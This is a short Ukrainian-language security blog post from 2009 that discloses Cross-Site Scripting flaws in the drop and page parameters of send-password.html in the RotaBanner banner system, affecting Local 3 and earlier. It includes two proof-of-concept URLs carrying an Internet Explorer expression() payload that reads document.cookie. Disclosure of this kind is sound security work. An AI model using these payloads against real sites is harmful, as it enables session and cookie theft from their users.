Нові уразливості в RotaBanner

23:54 31.03.2009

У березні, 19.03.2009, я знайшов нові Cross-Site Scripting уразливості в банерній системі RotaBanner (виробництва Art. Lebedev Group).

Раніше я вже писав про уразливості в RotaBanner.

XSS (IE):

Уразливості в файлі send-password.html в параметрах drop та page.

http://site/send-password.html?drop=''style='xss:expression(alert(document.cookie))'&action-send=true

http://site/send-password.html?drop='&page='style='xss:expression(alert(document.cookie))'&action-send=true

Вразлива версія RotaBanner Local 3 та попередні версії.


Leave a Reply

You must be logged in to post a comment.